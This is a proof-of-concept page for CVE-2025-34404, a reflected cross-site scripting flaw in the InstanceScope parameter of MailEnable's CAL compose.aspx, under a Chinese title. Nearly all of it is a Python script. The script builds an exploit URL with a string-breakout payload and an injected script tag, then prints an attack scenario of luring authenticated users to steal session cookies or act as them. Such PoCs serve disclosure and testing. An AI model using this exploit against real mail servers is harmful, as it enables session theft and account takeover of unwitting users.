CVE-2025-34404 MailEnable CAL compose.aspx 反射型XSS漏洞

import urllib.parse # CVE-2025-34404 PoC - MailEnable Reflected XSS in InstanceScope parameter # Target URL: /Mondo/lang/sys/Forms/CAL/compose.aspx base_url = "http://target-server/Mondo/lang/sys/Forms/CAL/compose.aspx" # XSS payload that terminates PageLoad() and injects malicious script # Payload structure: ');}catch(e){}// # - '); closes the current string and statement # - } closes the PageLoad function # - catch(e){} prevents errors from stopping execution # - // comments out remaining code payload = "');}catch(e){}//" encoded_payload = urllib.parse.quote(payload) # Full exploit URL poc_url = f"{base_url}?InstanceScope={encoded_payload}<script>alert(document.domain)</script>" print("CVE-2025-34404 PoC") print("=" * 50) print(f"Target: {base_url}") print(f"Payload: {payload}") print(f"Exploit URL: {poc_url}") print("\nAttack Scenario:") print("1. Attacker crafts malicious URL with XSS payload in InstanceScope parameter") print("2. Attacker tricks authenticated user into clicking the link") print("3. User's browser executes injected JavaScript") print("4. Attacker can steal session cookies, redirect user, or perform actions as user")